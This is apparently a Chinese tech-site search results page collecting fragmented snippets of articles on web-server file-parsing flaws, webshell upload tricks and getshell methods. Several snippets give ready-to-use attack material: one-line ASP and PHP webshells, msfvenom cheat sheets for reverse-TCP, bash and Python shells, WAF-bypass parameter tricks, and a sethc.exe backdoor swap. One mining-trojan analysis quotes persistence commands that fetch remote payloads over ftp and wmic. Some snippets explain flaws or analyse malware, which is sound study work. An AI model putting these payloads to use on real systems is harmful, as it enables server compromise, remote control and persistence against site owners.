展开

关键词

IIS-解析漏洞(上)

情况一:/liuwx.asp/liuwx.jpg 介绍:在网站的根目录下创建一个命名为liuwx.asp的文件夹,该文件夹下有一个liuwx.jpg的图片木马,也就是说该目录下的所有文件都会被当做asp 为了方便演示,我吧图片内容修改为asp一句话来演示<%execute(request("cmd"))%>: 然后用菜刀链接URL: http://192.168.119.133/liuwx.asp/liuwx.jpg | cmd ? 这个时候我们就成功得到了一个webshell 情况二 在网站根目录下创建一个命名为liuwx.asp;.jpg的文件,其中和上面的一样,里面写了asp一句话 ? 用菜刀链接URL: http://192.168.119.133/liuwx.asp;.jpg | cmd ?

50710

Msfvenom参考总结

(- -help-formats 列出所有文件格式) Executable formats: asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd Asp msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 20. Bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT=-f raw > shell.sh 24. Perl msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 25.

30630
  • 广告
    关闭

    腾讯云+社区系列公开课上线啦!

    Vite学习指南,基于腾讯云Webify部署项目。

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    干货 | 渗透之网站Getshell最全总结

    |php|jsp|aspx|asa|cer,保存后上传aasps文件,上传后为asp文件可以解析Getshll 上传其他脚本类型Getshell 一台服务器有多个站,如a网站为asp脚本,b网站为php 脚本,而a中限制了上传文件类型为asp的文件,此时可以上传php的脚本,来拿shell;也可以尝试脚本文件后缀名改为asa或者在后面直接加个.如xx.asp.来突破文件类型限制进行上传来Getshell 数据库命令执行Getshell Access导出 Access可导出xxx等文件需要配合解析漏洞 create table cmd (a varchar(50));insert into cmd (a) php echo \'

    \'; system($_GET[\'cmd\']); echo \'
    \'; ? cmd=ipconfig #cmd=后面加命令 方式七 过杀毒软件方式 上传图片马c.jpg,图片马内容如下: <?php 导出Webshell select '<?

    2.1K41

    Metasploit-有效负载备忘单

    msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=<连接的端口> LPORT=<连接的端口> -e cmd php ' | tr -d '\n' > shell.php && pbpaste >> shell.php asp msfvenom -p windows / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f asp> shell.asp JSP msfvenom -p java / jsp_shell_reverse_tcp LHOST msfvenom -p ruby/shell_reverse_tcp LHOST=<IP地址> LPORT=<连接的端口> -f raw -o payload.rb lua: msfvenom -p cmd 脚本有效负载 Python: msfvenom -p cmd / unix / reverse_python LHOST = <IP地址> LPORT = <连接的端口> -f raw> shell.py

    26530

    msfconsole笔记

    (- -help-formats 列出所有文件格式) Executable formats: asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd > -f asp > shell.asp 20. Bash msfvenom -p cmd/unix/reverse_ LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > Perl msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw

    7510

    中间件的解析漏洞详解及演示

    .文件解析 sp.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 sp.asp,那么 /sp.asp/1.jpg 将被当作asp文件来执行。假设黑客可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。 php eval($_POST[cmd]);?>');? 2.将23.asa;jpg文件改名为23.jpg,并放到1.asp目录下访问,然后使用蚁剑连接 ? Nginx 漏洞 上传一个图片马,里面含有代码 <? php eval($_POST[cmd]);?>');?> 该木马会在上传后,运用Apache的解析漏洞再次访问时生成一个shell.php木马 ? 访问该图片,并在末尾加上/.php ?

    72110

    收藏Metasploit payload

    php' | tr -d '\n' > shell.php && pbpaste >> shell.php ASP msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f asp > shell.asp JSP msfvenom -p java / jsp_shell_reverse_tcp / jsp_shell_reverse_tcp LHOST = <您的IP地址> LPORT = <您要连接的端口> -f war > shell.war Python msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址> LPORT = <你要连接的端口> -f raw > shell.py Bash msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址> LPORT = <您要连接的端口> -f raw > shell.sh Perl msfvenom -p cmd

    13620

    生成msf常用payload

    在这里既然使用到了在Windows下执行应用程序,我们就大概盘点一下在Windows执行应用程序的几种方式: 双击运行 cmd下运行exe 利用Powershell远程下载执行 利用at或schtasks php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp Python msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f On> -f raw > shell.sh Perl msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port

    96200

    Msfvenom – Metasploit 生成 Payloads 备忘录

    php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war 脚本 Python msfvenom -p cmd reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py Bash msfvenom -p cmd reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh Perl msfvenom -p cmd

    76910

    IIS服务器配置及网站发布

    Net扩展、ASP、ASP.NET、ISAPI扩展、ISAPI扩展器); (快捷:1、web管理工具2、万维网服务 都勾选上) 3、配置IIS 选中默认网站Defaultwebsite—— ——ASP————应用父路径(TRUE)————右上角(应用); 4、点开默认网站,右上角“绑定”————“添加”————本机的IP地址《可以选择全未分配》————端口号《端口号就用80》; 5 v4.0.30319; 7、开始————命令提示符(右键)以管理员身份运行; 8、(1)、将路径C:\Windows\Microsoft.NET\Framework\v4.0.30319;右键黏贴到cmd 中去,(注意:在cmd中Ctrl+V无效); (2)、接着再输入“aspnet_regiis.exe -i”,注册“aspnet_regiis.exe -i”,稍等片刻; (3)、注册成功;说明 服务器根据请求头的HOST来判断你是要访问哪个网站 新建一个网站 0.新建网站我设置的端口为8080 1.iis—设置“应用程序池”—双击”web1“—-应用程序池—为.netFramework4.0 2..cmd

    1.2K10

    实战|记录一次渗透测试项目

    数了一下,大概就是一个服务器上搭了十几个应用(服务器够强大),抽了几个出来访问,发现都是老古董,asp语言开发的站,那数据库就是access的咯,可能就是RP好,注入拿下解出账号密码admin/amdin888 然后到数据库备份的地方,我们要先复制好刚才成功上传的图片地址,然后到数据库备份处,就是通过数据库备份功能把jpg的一句话木马的格式改成asp。 ? ? windows server不能使用win10的cmd,需要对应版本。 2、上传一个大马寻找可读写目录,重新上传一个cmd(版本需要匹配) 第一个方法试过了,不行。 可读写目录找到了,接下来就是上传一个新的cmd(64/32)都上传一个,测试一下。上传的就不截图了,看下执行命令吧。 ? ?

    68620

    发布后Docker运行

    引用链接 centos 7 + Net Core 3.0 + Docker 配置说明(不含https asp net core 3.1 发布到 docker 引用: 基于上文所创建的文件进行发布,并在Linux image.png 发布 docker run --name webtest -p 8080:8080 -d webtest:v1 打开防火墙端口号 8080 firewall-cmd --zone= public --add-port=8080/tcp --permanent # 开放5672端口 firewall-cmd --reload # 配置立即生效 查看发布效果 ?

    38420

    第三方组件出奇迹(日常福利)

    disable_function的方法都歇菜了 之前看过Com组件实现Windows下bypass disable_function的案例 奈何权限根本操作不到php的配置文件,直接告辞 但是我突然想到主站是个asp 的站他肯定支持asp,二话不说上传了asp一句话 成功执行了命令! 一个iis权限,现在也可以看整个D盘不再是www目录 同时也支持aspx,但试了一下跟asp一样权限也只能看d盘 0x06 一生之敌 想执行一下tasklist却发现执行不了,systeminfo也没办法执行 这里替换了粘贴键为cmd(把system32目录下的sethc.exe替换为cmd.exe) 直接登录服务器5下shift摁出来,cmd弹弹弹 System shell GET√ ?

    98020

    红队攻击-绕过waf以及IDS等流量设备

    5 对参数操作 参数名称可以通过多种方式进行操作,具体服务器上运行的服务器端语言,还有取决于服务器的特性,这里讲一下php和asp的绕过。 1.通过硬编码值造成绕过 PHP 中的 **+**符号可用于实现此目的,而 ASP 中的 **%** 符号将实现类似的结果 在 ASP 中,可以将无效的 URL 编码添加到参数名称中(请注意,编码必须无效才能正常工作 ) 例子: /cmd/a.php? %value=payload /cmd/a.php?%}9value=payload 在 PHP 中,加号可以达到同样的效果: /cmd/a.php?+value=payload 2. value=payload&value=payload 又比如 /cmd/a.php?page=cat /etc/passswd&page= 又比如 /cmd/a.php?

    20610

    PHP、ASP过安全狗一句话

    $a = $_GET['a']; $b = $_GET['b']; $c = base64_decode($a).base64_decode($b); $c = $_REQUEST['cmd > asp: <% dim x1,x2 x1 = request("pass") x2 = x1 eval x2 %>

    1K80

    文件上传漏洞超级大汇总-第一篇

    废话不多说了,直接上正文 1、IIS解析漏洞 1、目录解析(IIS6.0):建立*.asa 、*.asp格式的文件夹时,其目录下的文件都被当做IIS当做 ASP文件来解析(*.asp/1.jpg目录解析 其中88.asp下的88.jpg文件会当成asp解析 1、文件解析(IIS6.0):当文件为*.asp;1.jpg文件名畸形解析 ,IIS6.0一样把文件当成asp解析 原理:分号后面的不解析。 还有IIS6.0 默认的可执行文件除了asp还包含这三种: /aspdama.asa /aspdama.cer /aspdama.cdx 二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞 php eval($_POST[cmd])?>');? 步骤二复制文件到指定文件夹(或者直接用move将a.txt修改成shell.asp) COPY /a.txt HTTP 1.1 HOST: Destination:http://www.baidu.com/cmd

    1.5K71

    记一次mykings&暗云挖矿木马的排查与解决

    >>p&echo bye>>p&ftp -s:p 系统启动执行 ok rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa 系统启动执行 ok1 cmd bat的计划任务 net start MSSQLSERVER&del c:\windows\system\my1.bat #添加计划任务 schtasks /create /tn "Mysa" /tr "cmd windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F schtasks /create /tn "Mysa2" /tr "cmd debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F schtasks /create /tn "Mysa3" /tr "cmd ://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://172.83.155.170:8170/s.xsl\"" cmd

    1.8K31

    四十.WHUCTF (3)一道非常有趣的文件上传漏洞题(刀蝎剑详解)

    比如IIS的服务器会把诸如1.asp;1.jpg以asp来解析,虽然后缀本质是jpg;旧版的Apache可以上传1.php.xxx文件,只要xxx对容器来说不是动态脚本不能解析,它就会往左边逐个解析,直到遇到 ---- 方法6:特色版本漏洞 ① IIS6.0 解析漏洞 目录解析 以“*.asp”命名的文件夹里的文件都将会被当成ASP文件执行,比如“1.asp/1.jpg”,这里1.jpg会被当做asp文件执行 文件解析 “*.asp;.jpg”像这种畸形文件名在 “;” 后面的直接被忽略,也就是说当成 “*.asp”文件执行。比如“1.asp;1.jpg”命名的文件,同样是以asp脚本进行执行。 利用IIS6.0解析漏洞,我们可以在网站下建立名字为“*.asp” 、“*.asa”的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析。 php @eval($_POST[cmd])?>'); ?> 访问“/1.jpg/shell.php”显示的内容为空。

    26620

    实战|记录一次渗透测试项目

    数了一下,大概就是一个服务器上搭了十几个应用(服务器够强大),抽了几个出来访问,发现都是老古董,asp语言开发的站,那数据库就是access的咯,可能就是RP好,注入拿下解出账号密码admin/amdin888 然后到数据库备份的地方,我们要先复制好刚才成功上传的图片地址,然后到数据库备份处,就是通过数据库备份功能把jpg的一句话木马的格式改成asp。 ? ? windows server不能使用win10的cmd,需要对应版本。 2、上传一个大马寻找可读写目录,重新上传一个cmd(版本需要匹配) 第一个方法试过了,不行。 可读写目录找到了,接下来就是上传一个新的cmd(64/32)都上传一个,测试一下。上传的就不截图了,看下执行命令吧。 ? ?

    35430

    解析漏洞——中间件

    所以当他禁止上传asp文件时,可以上传asa、cer 、cdx文件 这里我用的是IIS 6.0版本 ? 上传成功后用菜刀连接,这里脚本类型选择ASP(eval) ? 连接成功 ? 2、IIS 6.0 IIS 6.0 有两个单独的解析漏洞 1.目录解析 /xx.asp/xx.jpg 在网站下名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都会被IIS当作asp文件来解析并执行 11.asp;.jpg 会被服务器当做11.asp执行 所以如果禁止上传asp文件时,可以上传一个11.asp;.jpg 文件 同样,利用前面的文件,开始上传 ? php eval($_POST[cmd])?>');?> 然后访问bb.jpg文件时,在后面加上.

    31942

    相关产品

    • 云服务器

      云服务器

      云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。 腾讯云服务器(CVM)为您提供安全可靠的弹性云计算服务。只需几分钟,您就可以在云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券